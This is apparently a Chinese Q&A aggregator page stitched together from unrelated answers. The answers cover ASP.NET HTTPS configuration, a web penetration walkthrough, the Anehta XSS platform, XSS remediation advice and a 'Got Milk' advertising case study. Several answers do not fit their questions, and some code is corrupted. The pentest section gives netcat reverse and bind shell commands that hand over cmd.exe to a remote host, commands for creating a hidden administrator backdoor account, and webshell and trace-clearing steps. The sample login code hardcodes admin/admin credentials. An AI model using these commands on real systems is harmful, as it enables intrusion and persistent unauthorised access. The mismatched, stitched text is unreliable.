beef腳本使用

㈠ beef怎麼把網站變成https

https及https的本地測試環境搭建。asp.net結合https的代碼實現http網站轉換成https網站，以及之後遇到的問題等。

一：什麼是https

SSL（Security Socket Layer）全稱是加密套接字協議層，它位於HTTP協議層和TCP協議層之間，用於建立用戶與伺服器之間的加密通信，確保所傳遞信息的安全性，同時SSL安全機制是依靠數字證書來實現的。

SSL基於公用密鑰和私人密鑰，用戶使用公用密鑰來加密數據，但解密數據必須使用相應的私人密鑰。使用SSL安全機制的通信過程如下：用戶與IIS
伺服器建立連接後，伺服器會把數字證書與公用密鑰發送給用戶，用戶端生成會話密鑰，並用公共密鑰對會話密鑰進行加密，然後傳遞給伺服器，伺服器端用私人密
鑰進行解密，這樣，用戶端和伺服器端就建立了一條安全通道，只有SSL允許的用戶才能與IIS伺服器進行通信。

提示：SSL網站不同於一般的Web站點，它使用的是「HTTPS」協議，而不是普通的「HTTP」協議。因此它的URL（統一資源定位器）格式為「https：//網站域名」。

二：https的本地測試環境搭建

1：win7/windows server 2008R2中 IIS7/IIS7.5 搭配https本地測試環境

2：windows server 2003中IIS6.0 搭配https本地測試環境

三：asp.net 結合 https的代碼實現

https是由IIS，瀏覽器來實現的傳輸層加密，不需要特意的編碼。。。平時怎麼在asp.net裡面編寫代碼，就怎麼寫。

很可能要問，為什麼我的站點使用了https之後，用firebug之類的軟體查看值提交的時候，還是會顯示明文呢？例如，博客園的登陸界面提交。

http：//passport.cnblogs.com/login.aspx

為什麼這里還是能看到明文的用戶名和密碼呢？

原因是因為：https（ssl）的加密是發生在應用層與傳輸層之間，所以，在傳輸層看到的數據才是經過加密的，而我們捕捉到的http post的，是應用層的，是還沒經過加密的數據。

加密的數據只有客戶端和伺服器端才能得到明文 客戶端到服務端的通信是安全的

支付寶也是https的，但是他的同時也增加了安全控制項來保護密碼， 以前認為這個只是用來防鍵盤監聽的，其實，看下面http post截獲的密碼：這個安全控制項把給request的密碼也先加了密，緊接著https再加次密，果然是和錢打交道的，安全級別高多了：)

四：http網站轉換成https網站之後遇到的問題

整站https還是個別的頁面採用https？網站的連接是使用相對路徑？還是絕對路徑？

如果是整站都是https,那麼會顯得網頁有些慢，如果是個別頁面採用https，那麼如何保證從https轉換到http的時候的url的准確性呢？

比如我們用http的時候，網站的頭部底部都是用的相對路徑，假如你的頁面是 http：//aa/index.aspx 你跳轉到 https：//aa/login.aspx 這里怎麼來跳轉？只能把超鏈接寫死

登陸 但是這樣的話，你跳轉過去之後的頁面 ，所有的相對路徑都變成了https開頭了，這樣很影響網站的效率。

雖然使用絕對地址可以解決，但是那樣顯然不好移植。

下面就是使用第三方的組件，來解決上面的這個問題

步驟

先下載dll文件 http：//code.google.com/p/securityswitch/downloads/list 我選擇的是 SecuritySwitch v4.2.0.0 - Binary.zip這個版本

1： 我們來看看測試項目

admin 文件夾，需要登錄之後，才能訪問。admin裡面的 login.aspx 可以訪問。整個admin文件夾都需要https訪問：

contact.aspx 需要https 訪問：

default.aspx 和 view.aspx 採用 http 訪問：

鏈接我們都採用相對路徑,並沒有寫死成 http：//www.xx.com/a.aspx 或者是 https：//www.xx.com/a.aspx。

下面我們開始用SecuritySwith來實現上面的https和http訪問的規則。

2：在項目上，添加引用 SecuritySwitch.dll ，並且添加智能提示。

這樣，只能提示就有了。

3：然後我們在web.config裡面添加設置 。根據IIS的不同，還分為 IIS6+ IIS7.X（經典模式） 以及 IIS7(集成模式) 的不同的配置，這里我們是按照IIS6+IIS7.X的(經典模式)來配置的。

只看看裡面的 SSL配置即可：

<?xml version="1.0"?>
<configuration>
<!--SSL配置1開始-->
<configSections>
<section name="securitySwitch" type="SecuritySwitch.Configuration.Settings, SecuritySwitch" />
</configSections>
<securitySwitch baseInsecureUri="http://webjoeyssl"
baseSecureUri="https://webjoeyssl" xmlns="http://SecuritySwitch-v4.xsd"
mode="On">
<!--如果你的http和https僅僅只有一個s的區別，那麼這里的base的2個url可以不寫，那為什麼還要搞這2個url呢？因為比如
你的 baseInsecureUri (基本不安全網址) 是 http://www.qq.com
而你的 baseSecureUri (基本安全網址) 是 https://safe.qq.com
然後這個時候你訪問一個需要https的頁面，假如是 login.aspx?return=joey
假如你是通過http://www.qq.com/login.aspx?return=joey訪問的,那麼這個
頁面會跳轉到http://safe.qq.com/login.aspx?return=joey
-->
<paths>
<add path="~/contact.aspx"/>
<add path="~/admin/login.aspx"/>
<add path="~/admin" />
<!--這里的admin因為不僅是 admin 文件夾，而且還包含類似的 adminNews.aspx adminQQ.aspx 頁面"-->
<!--但是如果是 ~/admin/ 就是專門指admin文件夾-->
</paths>
</securitySwitch>
<!--SSL配置1結束—>
<appSettings />
<system.web>
<compilation debug="true">
</compilation>
<!-- 內置票據認證 start-->
<authentication mode="Forms">
<forms name="mycook" loginUrl="admin/login.aspx" protection="All" path="/" />
</authentication>
<!--SSL配置2 如果是 IIS <= 6.x, IIS 7.x + 經典模式-->
<httpMoles>
<add name="SecuritySwitch" type="SecuritySwitch.SecuritySwitchMole, SecuritySwitch" />
</httpMoles>
<!--SSL配置2結束-->
</system.web>
<!--SSL配置2 如果是IIS7.X + 集成模式-->
<!--<system.webServer>
<validation ="false" />
<moles>
--><!-- for IIS 7.x + 集成模式 --><!--
<add name="SecuritySwitch" type="SecuritySwitch.SecuritySwitchMole, SecuritySwitch" />
</moles>
</system.webServer>-->
<!--如果是IIS7.X+集成模式 SSL配置2 結束—>
</configuration>

4： 由於用到了內置票據認證，所以要在 Global.asax添加以下代碼：

protected void Application_AuthenticateRequest(object SENDER, EventArgs e)
{
if (HttpContext.Current.User != null)
{
if (HttpContext.Current.User.Identity.IsAuthenticated)
{
if (HttpContext.Current.User.Identity is FormsIdentity)
{
FormsIdentity id = (FormsIdentity)HttpContext.Current.User.Identity;
FormsAuthenticationTicket tiecket = id.Ticket;
string userData = tiecket.UserData;
string[] roles = userData.Split(',');
HttpContext.Current.User = new System.Security.Principal.GenericPrincipal(id, roles);
}
}
}
}

5： 後台登陸界面 admin/login.aspx：

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="login.aspx.cs" Inherits="web.admin.login" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
用戶名：<asp:TextBox ID="txtUser" runat="server"></asp:TextBox><br />
密碼:<asp:TextBox ID="txtPass" runat="server"></asp:TextBox><br />
記住用戶名：<asp:CheckBox ID="chkUsername" runat="server" Checked="true"/>
<br />
<asp:Literal ID="litResult" runat="server"></asp:Literal>
<br />
<asp:Button ID="btnSubmit" runat="server" Text="提交" onclick="btnSubmit_Click" />
</form>
</body>
</html>

後台登陸界面 cs admin/login.aspx.cs：

using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.Security;
namespace web.admin
{
public partial class login : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void btnSubmit_Click(object sender, EventArgs e)
{
string username = txtUser.Text;
string pass = txtPass.Text;
bool ischeck=chkUsername.Checked;
if (username=="admin" && pass=="admin")
{
SaveLogin(username, ischeck);
}
}
private void SaveLogin(string username, bool ischeck)
{
HttpCookie cook;
string strReturnURL;
string roles = "admin";//將用戶的usernameid,保存到cookies，身份是 admin 身份
//要引用 using System.Web.Security;
FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(
1, username, DateTime.Now, DateTime.Now.AddMinutes(30), ischeck, roles);
cook = new HttpCookie("mycook");//對應webconfig裡面的 驗證裡面的 forms name="mycook"
cook.Value = FormsAuthentication.Encrypt(ticket);
Response.Cookies.Add(cook);
strReturnURL = Request.Params["ReturnUrl"];
if (strReturnURL != null)
{
Response.Redirect(strReturnURL);
}
else
{
Response.Redirect("default.aspx");
}
}
}
}

㈡ 蘋果系統怎麼安裝beef xss

office of MAC 文件大小的1個多G， 後綴名是*.iso。需要你在網上下載。 用U盤拷到你的MAC上。 雙擊打開MAC上的"Microsoft Office 2011.iso"，按步驟一步步安裝就可以了。 安裝完成後的，MAC最下面一欄里就會出現W/P/X/0幾個圖標的。說明你已經完裝好了，可以使用了。

㈢ web滲透是什麼

Web滲透測試分為白盒測試和黑盒測試，白盒測試是指目標網站的源碼等信息的情況下對其滲透，相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透，以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟，信息收集，漏洞掃描，漏洞利用，提權，內網滲透，留後門，清理痕跡。一般的滲透思路就是看是否有注入漏洞，然後注入得到後台管理員賬號密碼，登錄後台，上傳小馬，再通過小馬上傳大馬，提權，內網轉發，進行內網滲透，掃描內網c段存活主機及開放埠，看其主機有無可利用漏洞（nessus）埠（nmap）對應服務及可能存在的漏洞，對其利用（msf）拿下內網，留下後門，清理痕跡。或者看是否有上傳文件的地方，上傳一句話木馬，再用菜刀鏈接，拿到資料庫並可執行cmd命令，可繼續上大馬.........思路很多，很多時候成不成功可能就是一個思路的問題，技術可以不高，思路一定得騷。

信息收集

信息收集是整個流程的重中之重，前期信息收集的越多，Web滲透的成功率就越高。

DNS域名信息：通過url獲取其真實ip,子域名(Layer子域名爆破機)，旁站(K8旁站，御劍1.5)，c段，網站負責人及其信息（whois查詢）

整站信息：伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型；

網站常見搭配為：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目錄信息（御劍，dirbust）

開放埠信息（nmp）

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描，看其是否有可利用漏洞。

常見漏洞：

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什麼也好對相應漏洞進行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

後台密碼爆破（burp）

埠爆破（hydra）

提權

獲得shell之後我們許可權可能很低，因此要對自己提權，可以根據伺服器版本對應的exp進行提權，對於Windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行埠轉發可用nc

nc使用方法：

反向連接

在公網主機上進行監聽：

nc-lvp 4444

在內網主機上執行：

nc-e cmd.exe 公網主機ip4444

成功之後即可得到一個內網主機shell

正向連接

遠程主機上執行：

nc-l -p 4444 -t -e cmd.exe

本地主機上執行：

nc-vv 遠程主機ip4444

成功後，本地主機即可遠程主機的一個shell

然後就是對內網進行滲透了，可以用主機漏洞掃描工具（nessus,x-scan等）進行掃描看是否有可用漏洞，可用msf進行利用，或者用nmap掃描存活主機及開放埠，可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門

留後門

對於網站上傳一句話木馬，留下後門

對於windows用戶可用hideadmin創建一個超級隱藏賬戶

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到，但在控制面板可以看到，還需要改注冊表才能實現控製版面也看不到，太過麻煩，不多贅述，所以還是用工具省心省力。

㈣ anehta 這是什麼意思

Anehta -- 新一代的web攻擊平台

為什麼叫：Anehta ?
因為「雅典娜」的名字是 ：athena ，但是這個名字已經被sourceforge上的某人搶了，所以按照「刺氏命名法」，把「athena」反過來，本項目正式命名為： Anehta，中文發音：「阿內塔」
Anehta 項目是做什麼的？
簡單來說，你可以理解為 AttackAPI + BeEF。 但是Anehta 絕對沒有這么簡單，因為我實現了很多特有的機制，使得Anehta更加強大以及更加容易擴展。
沒聽過什麼AttackAPI，還是不知道Anehta是做什麼。
更通俗來說，Anehta 就是一個跨站腳本攻擊（xss）的利用平台。
Anehta是用什麼語言開發的，對系統有什麼要求？
由於在一開始就考慮到了通用性、跨平台性、跨瀏覽器、穩定性、易擴展性，所以Anehta在這方面做的是非常好的。anehta是基於javascript 和 PHP開發的。其中部分用到了 jQuery 框架，雖然anehta 可以獨立於jQuery存在，但是考慮到引入jQuery 後，可以大大降低開發模塊的成本，所以還是保留了。使用jQuery的另外一個好處就是跨瀏覽器，因為jQuery 本身是跨瀏覽器的，所以anehta也很容易做到這點.
使用PHP是因為PHP是當今使用最為廣泛的腳本語言之一。(其實有個很不可告人的原因是因為大部分肉雞都是PHP的吧，嘿嘿，anehta不需要任何perl、python、ruby等腳本支持)

㈤ " CHECK IT OUT " 到底是啥意思啊 好象挺時髦的!

「CHECK IT OUT」在黑人說唱即rap裡面一般可以理解為：聽我說！仔細聽一聽！聽我說！在日常使用中，「check it out」可以翻譯為：仔細討論、查看清楚、仔細查看核對。

例如：Maybe we ought to go down to the library and check it out. 或許我們應該去趟圖書館，查個明白。 Sure. I will reply to you as soon as I check it out. 當然了，我查看後馬上給你回復。

(5)beef腳本使用擴展閱讀

1、check 英式發音 [tʃek]； 美 式發音[tʃɛk] 可以翻譯為：vt. 檢查，核對;制止，抑制;在…上打勾 vi. 核實，查核;中止;打勾;[象棋]將一軍 n. <美>支票;制止，抑制;檢驗，核對

2、《Check it out》還是美國著名饒舌創作歌手Nicki Minaj和Will.I.Am合作的一首歌曲。作為Nicki的Pink Friday第二支單曲打出。

參考資料來源：網路--《Check it out》

㈥ 我做的網站被漏洞檢測說是有什麼xss跨站腳本漏洞，怎麼修復啊，哪位大俠幫看看！！

你這個頁面我沒看出來有xss啊，倒是有可能有sql注入漏洞。Title變數要過濾一下啊，要不用戶可能會修改Title的內容，比如插入一個單引號，後面跟上自己的sql語句，這樣會導致查到一些不該看到的資料庫內容，引發注入漏洞。所以，要過濾一些用戶提交的數據，把特殊字元全濾掉，網路一些啊asp防注入，有源碼的。

xss，假設我是攻擊者，我把提交數據的一個變數修改為『aaaaaaaaaaaa』（post或則get提交的都可以，因為你是request接收的），然後看頁面中回顯『aaaaaaaaaaaa』的位置。如果出現了，我可以嘗試修改一下加入「<>」等，破壞掉你的html結構，如果可以破壞，那麼我就可以插入javascript代碼「<script src=...></script>」。盜取用戶的cookies（所以cookies最好只用httponly），結合beef甚至操作用戶的瀏覽器（許可權和功能很低的，別想多了）。
綜上所述，你寫源碼時，必須要檢查所有用戶可以修改和提交的數據（包括cookies等http頭裡面的），然後在輸出點做好編碼。輸入與輸出控制好了可以減免很多麻煩。
還可以使用安全寶、知道創於等公司提供的雲waf服務，這樣用戶提交的數據會由他們檢測，並且給你做好了cdn加速。注意的是，不要把你真實的ip暴露在網上。有的人只做www.test.com的解析，沒有做test.com的解析，導致真實ip暴露在網上。
或者使用一些開源的cms，asp的我不了解，php的我知道有wordpress，代碼寫的很不錯了，只要你定期更新版本，不亂下載一些插件（插件都是別人提交的，編程水平不一定很好所以），一般不會出什麼大的漏洞。插件也要定期更新。
防止旁站，找主機服務商時要注意（找大的和好的），亞馬遜這樣的，每個站的許可權都是控制的很死的，所以很難提權。
至於社工，安全是一種意識，慢慢培養吧。我了解的就這些了，希望能對你有幫助。

㈦ 一個完整的滲透測試流程，分為那幾塊，每一塊有哪些內容

包含以下幾個流程：

信息收集

第一步做的就是信息收集，根據網站URL可以查出一系列關於該網站的信息。通過URL我們可以查到該網站的IP、該網站操作系統、腳本語言、在該伺服器上是否還有其他網站等等一些列的信息。

漏洞探測

當我們收集到了足夠多的信息之後，我們就要開始對網站進行漏洞探測了。探測網站是否存在一些常見的Web漏洞，比如：SQL注入 。

漏洞利用

探測到了該網站存在漏洞之後，就要對該漏洞進行利用了。不同的漏洞有不同的利用工具，很多時候，通過一個漏洞我們很難拿到網站的webshell，我們往往需要結合幾個漏洞來拿webshell。

內網滲透

當我們能跟內網主機進行通信後，我們就要開始進行內網滲透了。可以先使用nmap對內網主機進行掃描，探測在線的主機，並且探測其使用的操作系統、開放的埠等信息。

內網中也有可能存在供內網使用的內網伺服器，可以進一步滲透拿下其許可權。

痕跡清除

達到了目的之後，有時候只是為了黑入網站掛黑頁，炫耀一下；或者在網站留下一個後門，作為肉雞，沒事的時候上去溜達溜達；亦或者掛入挖礦木馬。

撰寫滲透測試保告

在完成了滲透測試之後，就需要對這次滲透測試撰寫滲透測試報告了。明確的寫出哪裡存在漏洞，以及漏洞修補的方法。以便於網站管理員根據我們的滲透測試報告修補這些漏洞和風險，防止被黑客攻擊。

㈧ AP在加州牛奶加工者實施的「GOT MILK」的作用他們做了什麼調查，是如何收集資料的謝謝！！

主題5：廣告專業化的過程:AP制

興起時，影響互聯網的「信任度」是收到質疑的。03年的SARS，讓人們看到互聯網上的「小道消息」有一定的信任度。
戶外廣告也在SARS時得到發展。

一、AP制的興起背景
英國最早設立AP部門的兩家廣告代理公司分別是Stanley Pollitt創始的BMP（Boase Massimi Pollitt）和Stephen King主管下的JWT（J. Walter Thompson）。

1. 廣告主自身設置獨立的營銷部門，對廣告效果的要求日益嚴格
• 在六十年代以前，廣告主的市場營銷計劃通常是由廣告公司來制定。
• 當時廣告公司的市場營銷部門的主要任務是收集並分析各種原始或二手的調查數據，為廣告主撰寫營銷計劃書，包括建議開展更多的調查研究，負責新產品或品牌開發的策劃事務等。
• 由於對受委託的企業缺乏長期的接觸和深入的了解，所以當時的營銷計劃書還都著眼於宏觀方面，忽視企業盈利方式和前景等微觀方面。在這種營銷計劃書指導下的廣告活動缺乏必要的有效性的保證。
• 廣告主逐漸意識到這一點，並開始設立自己的營銷部門，由自己來完成營銷計劃的設計，廣告公司的營銷部門只充當偶爾的顧問。
• 在市場激烈競爭的情況下，廣告主要求利潤最大化，這一點反映在廣告上，就體現為要求所作的廣告必須有效果（effectiveness），即要求廣告對消費者的心理特徵或購買行為必須產生有利於廣告主的影響，而不是單純地追求廣告活動執行的效率（efficiency），如廣告活動的持續時間、簡單地測量廣告到達率、回憶率等。與效率相比，效果對於廣告主來說更實在，更利於企業的長期發展。

2、消費者在營銷過程中地位的提升
• 經過二戰後十幾年的發展，商品同質化程度日益嚴重，市場競爭愈演愈烈，消費者在營銷中的重要地位已為眾多業內人士所接受。
• 廣告代理公司開始將其目光轉移到了消費者身上，於是出現了諸如消費者洞察、消費者對廣告的反應、消費者消費廣告等一系列理論學說
• AP制的產生就是廣告代理公司對消費者在營銷過程中的地位提升所做出的反應。
• Rod Meadows在ADMAP1983年的7/8合刊中發表了一篇名為「They Consume Advertising Too」的文章。
• 在文中，他提出了消費者消費廣告的觀點。他認為已經有越來越多的人在根據自身的喜好去主動地賞析廣告，把廣告作為一種商品進行消費。這部分人希望優秀的廣告能夠吸引他們的注意力，能夠以某種形式來刺激他們，給予他們娛樂，並與他們自身的興趣相吻合。
• 這一點在英國廣告業的發展史上表現得最為突出。英國人的保守聞名世界，因而當1954年10月16第一支商業電視廣告進入英國家庭時，上至議員，下至平民百姓對此大肆抨擊。然而經過十幾年自身的努力，同時在美國伯恩巴克（William Bernbach）於五六十年代倡導的創意革命的影響下，英國人對廣告的態度發生了驚人的變化，在英國，民眾對廣告認可的程度超過了美國，與電影、電視並行成為英國三大流行文化。這種氛圍的形成為AP在英國的滋生提供了良好的環境。
• 消費者消費廣告習慣的形成，及由此造成的消費者對廣告創意要求的日益苛刻，給廣告代理公司中的創意部門施加了一定的壓力。
• 在這種情況下，創意人員虛心採納多種創意手段，從其他部門人員尋求信息或創意的靈感，而原來營銷部門量化的統計結果往往很難滿足創意部門對創意的渴求。
• AP部門的一個重要任務就是協調廣告公司中各部門之間的關系，創造與創意部門人員共事的良好氛圍，並將其匯總的有關商品、市場和消費者信息，通過簡潔、明了、富有啟迪的方式傳遞給創意人員，為其創意靈感的產生創造條件。

3、市場調查公司的興起，形成對廣告代理公司強有力的競爭
• 矛盾：由於技術手段的發展，無論是廣告主的營銷部門，還是市場調查公司，抑或是廣告代理公司的營銷部門，都有能力獲得數量更多、質量更好的市場信息數據。
• 與廣告代理公司中的營銷部門相比，市場調查公司中的數據分析人員地位更高，待遇更好，所面臨的行業內競爭要少一點，更易發揮其專業特長。一批優秀的數據分析人員離開原來供職的廣告公司，投身於吃香的調查公司。
最初的市場調查是由廣告公司完成的
4、困境中廣告代理公司的反應及其內部的權力制衡
• 廣告主營銷部門的設立及營銷手段的提高，使廣告代理公司的營銷部門相形見絀，同時客戶主管也失去了強有力的營銷計劃支持；
• 消費者反應、新廣告模型及消費廣告等一系列理論的提出，使得原來營銷部門的傳統技術手段略顯過時，致使創意部門倍受壓力；
• 市場調查公司的蓬勃發展和挖人行為，對已處於困境中的廣告公司無疑是雪上加霜。
• 這一切都表明廣告代理公司傳統的機構設置亟待調整。
• 原來的營銷部門必須被撤換，而取代它的新的部門：
• 客戶主管提供說服客戶的理由，
• 又能為創意部門補充創意靈感，
• 同時還要區別於市場調查公司，代表消費者真實感受。

二、AP制的具體內容
1、平時積累階段
• 從事AP工作的人被稱作account planner。一個優秀的planner必須具備以下素質：
• 與各種人巧妙溝通的交流才能；
• 分析和運用數據的才能；
• 對策略的宏觀把握能力
• 對市場信息、消費者反應及創意靈感的敏銳的洞察力。
• 而這一系列能力的形成，則要依賴於平時planner不斷的學習和有意識的培養。

2、策略策劃階段（strategic planning）
• 參加客戶為廣告代理公司的客戶部門而召開的有關產品的定向說明會
• 經常與客戶主管一起與客戶進行有關策略方面的溝通
• 查閱諸如尼爾森等調查公司的相關產品或行業的調查報告
• 召開專題組座談（focus group），調查消費者對該產品及相關產品的認知情況、購買行為及消費習慣等
• 幫助客戶制定或影響其市場營銷策略。
• 實施AP制的廣告代理公司通過其掌握的消費者反應（response），試圖影響廣告主營銷計劃的宏觀方面，即策略部分，從而避免由於策略失誤而造成的巨大損失。

3、創意簡報階段（creative briefing）
• 所謂創意簡報（creative brief），指的是在account planner匯總有關客戶、消費者及市場信息之後，再對此進行精簡，生成一個簡潔明了，富有啟迪的建議，然後再通過一系列的會議，由account planner向創意人員以巧妙地方式傳遞這一建議。這一過程統稱為創意簡報階段（creative briefing）。
一份好的創意簡報是溝通策略性思考和成功廣告的一座重要橋梁，它必須同時包含三種目標：
1. 它必須能夠使創意人員頭腦中對該廣告所要實現的目標有一個准確清晰的框架；
2. 它必須能向創意人員描述該廣告目標消費群的真實的心理特徵和消費行為。這一描述既要掌握該目標消費群的總體特徵，又要細致入微到單個目標消費者的具體的生活經歷。這一描述不是定量的、呆板的、純粹理性的，而應該是定性的、創新的、深入到消費者感性層面的；
3. 創意簡報中所含的信息必須能夠把消費者和廣告目標聯系起來，具有很強的指向性。

在生成創意簡報時，切忌把所有信息不加篩選，全部放入創意簡報中去，而應該有針對性地進行選取。以下幾個問題可以作為生成創意簡報的基礎：
• 究竟為什麼我們必須做廣告？
• 我們的廣告想要達到什麼目標？
• 廣告的目標消費群是哪部分人群？
• 對於這些人，我們到底了解多少？
• 我們需要溝通的主題是什麼？
• 策劃該主題的最佳方式是什麼？
• 如何知道我們所做的正確與否？

4、創意開發研究階段（creative development research）
• 創意開發研究一詞是由Jon Steel提出來的，實際上就是指對創意雛形的檢驗。但由於考慮到該階段的側重點在於了解或預測消費者對該創意雛形的反應，了解消費者做出這種反應的原因，力圖進一步完善該創意，於是就運用了creative development research這一表達方式。所謂的創意雛形是指粗略的創意點子，而不是馬上就可以拿去播放或刊登的廣告成品。這么做主要還是基於成本上的考慮。
• 創意開發研究的具體做法是選取能夠代表目標消費群的樣本，以專題組座談（focus group）等定性研究方法，通過座談主持人（moderator）的精心協調，捕捉在座談過程中消費者下意識流露出來的對創意雛形的真實反應，並據此及時修改或完善該創意。

AP案例分析：
加州牛奶加工者顧問董事會實施的「Got Milk」一案。
背景分析：
• 加州牛奶消費量的大幅度下降；
• 成立加州牛奶加工者顧問董事會；
• 與Goodby, Silvertein & Partners的接洽。
加州牛奶消費量的大幅度下降
• 1980年，加州牛奶的人均年消費量為30加侖（一加侖=4.5升），1993年下降到24.1加侖，整整下降20%。
• 但同期人口穩定增長，抵消了人均消費量的降低，牛奶消費在總量上保持穩定。
• 80年代後期，人均消費下降幅度過大，導致牛奶市場開始萎縮。1992-1993單單一年之內，下降3.6%。
加州牛奶加工者顧問董事會
• 以往的廣告活動並未奏效；
• 成立加州牛奶加工者顧問董事會（Carlifornia Fluid Milk Processors』 Advisory Board→CFMPAB），決定採取新一輪的廣告活動；
• 具體實施：從銷售每加侖牛奶的所得中扣除3美分作為基金；廣告活動的期限是2年，若不成功，董事會將自動解散；
• 聘請Jeff Manning作為該董事會的執行經理。
Jeff Manning個人簡介
• 具有豐富經驗的廣告人，曾經在智威• 湯遜，麥肯Erikson, Ketchum 任職；
• 策劃過很多食品的廣告活動，其中包括egg, beef, banana 等;
• 相關的經歷，與廣告公司的默契配合，在這次活動中起了重要的作用。
與Goodby,Silvertein&Partners 的接洽
• 第一年的廣告預算是2500萬美元，但要求廣告效果顯著，作用迅即；
• 公司內部意見不一致，因為當時廣告業的普遍意見是牛奶客戶如同雞肋，棄之可惜，食之無味，認為給牛奶做廣告是註定要失敗的。公司不應該介入這件事情。
開放性的定向說明會（a wide-open brief）

• 現狀的陳述；
• 二手數據的獲得及應用；
• 廣告主明確闡述所要實現的目標。

二手數據的獲得及應用（Gallup）
• Gallup在全國范圍內對牛奶本身及牛奶消費行為的長期調查；
• 分析上述資料，得出牛奶消費量下降主要基於以下三個原因：
• 1. 病態地介意牛奶中的脂肪含量；
• 2. 「婦女嬰兒食品」，小時候媽媽的教誨kids→adolescence→althood;
• 3. 與Coca-Cola,Pepsi牛奶的定位和訴求點老套，缺乏新意。
以往廣告的弊端和效果
• 訴求點：牛奶對你的健康有好處；
• 訴求方法：俊男靚女，白皙的皮膚，潔白的牙齒，健壯的肌肉；
• 總之，牛奶是一種健康的飲料。

• 在改變消費者認知態度的方面，確實起了一定的效果。牛奶是有益的。
• 支持「我應該喝更多的牛奶」的比例，從1982年40%上升到1992的52%。
廣告主所要實現的目標
• Manning認為有時候形象根本不能代表什麼，尤其是對於牛奶這類商品而言。形象≠銷售；
• 廣告活動的重點不是改變牛奶的形象，而在於改變消費者行為；
• 只要牛奶的銷售量能提高，怎麼干都行，廣告中並不一定要出現牛奶。

策略策劃階段(strategic planning)
• 廣告目標受眾的重新確立；
• 訴求點的轉換；
• 訴求方法的創新；
• 媒介策劃的靈活運用
01. 廣告目標受眾的重新確立
• 兩個市場原理：①20：80的法則，即市場中20%的消費者貢獻80%的銷售額；②向經常使用某產品的消費者做廣告，其效果要比向偶爾使用或從未使用過的消費者做廣告要大得多。
• CFMPAB對牛奶消費習慣的研究表明：
02. 訴求點的轉換
• 訴求對象的重新確立要求轉換訴求點；
• 然而，牛奶除了健康之外，還有什麼呢？
• 調查表明，人們一般很少單獨飲用牛奶，牛奶只是對其他食物的補充而已。這些食物都有麥片、各種糕點、小甜餅、三明治、花生油等。
• 「____ and milk」, 「milk and ____」；
• Focus group: ①牛奶→聯想→牛奶
• Focus group：②巧克力、小甜餅、糕點
• 小結：
①食物可以用來產生慾望，而且不僅僅局限在麥片；牛奶本身並不能做到這一點；
②在巧克力等美食麵前，若沒有牛奶，食物貶值，氣氛遭到破壞，人們反應過激；
03. 訴求方法的創新
• 剝奪策略（a deprivation strategy），也稱違背實驗法。在一段時間內禁止使用生活中經常用到的商品，來製造不同尋常的情況，根據在此情況下消費者的行動和感受，發現商品對消費者的意義，並且對此進行調查。在調味料、飲料等商品經常使用這種方法進行調查。
• 文案撰寫：Have you got enough milk? →Got milk?
• 視覺設計：麥片、咖啡太普通，令人饞涎欲滴、被咬掉一口的巧克力、小甜餅或三明治更具沖擊力。
• 電視廣告作品的環境：調查表明，88%的牛奶都在家消費，所以廣告情節發生的背景應在家中——餐桌、廚房、冰箱。
創意開發研究(creative development research)
• 創意開發研究一詞是由Jon Steel提出來的，實際上就是指對創意雛形的檢驗。其側重點在於了解或預測消費者對該創意雛形的反應，了解消費者做出這種反應的原因，力圖進一步完善該創意。
• 向座談對象展示相關圖片，以及電視廣告的腳本(Alexander Hamilton & Aaron Burr)。
• 跟蹤電話采訪座談對象對創意雛形的印象。
04. 媒介策劃的靈活運用
• 時段的精心選擇：牛奶在家中的特定時間消費，如早晨，上午、下午和晚上吃點心的時間；
• D:\所有文件\所有廣告影視資料\影視圖片\got ml.MPG

廣告活動的效果及擴張
• 多種媒介的綜合使用：①電視（Aaron Burr篇, Couple篇, Baby and cat篇）、雜志；②高速公路出口處的路牌、食品店或超市的購物車及出售相應食物的地方；③促銷活動，與其他品牌合作：雀巢、Mother』s Cookies、General Mills、Kraft General Foods。
• 銷售量大幅度上升：經常消費牛奶的家庭由1993年70%上升到1995年的74%；在一天中使用牛奶的次數由1994年10月的3.9次上升為1995底的4.3次；94年銷售量比93年增加了0.7%,而94年之前銷售量持續下降，93年比92年下降3.6%。
• DMI全美乳製品生產者聯合會購買了這次廣告活動的版權，並把品牌延伸到服裝、玩具、杯子，成為大眾文化的一部分。

總結：
• 消費者洞察：深入到消費者生活中去，從而獲得消費者對產品的真實感受；
• 與客戶部、創意部互助合作，相互之間界限並不十分清楚；
• 定性研究和定量研究的創造性運用。

三、AP制的意義
1、在實際操作方面AP制有效地緩解了廣告公司所面臨的壓力
• 客戶部門由於有了AP部門的協助，以及策略策劃能力的提高，從而更易留住客戶，吸引新客戶，有利於廣告公司拓展新的業務。
• 創意部門因為AP部門在生成創意摘要和創意開發研究兩個階段的重要參與，其創意視野大大開闊，並與營銷策略緊密聯系，避免這兩個方面發生脫鉤的現象，從而使得廣告變得更為有效。
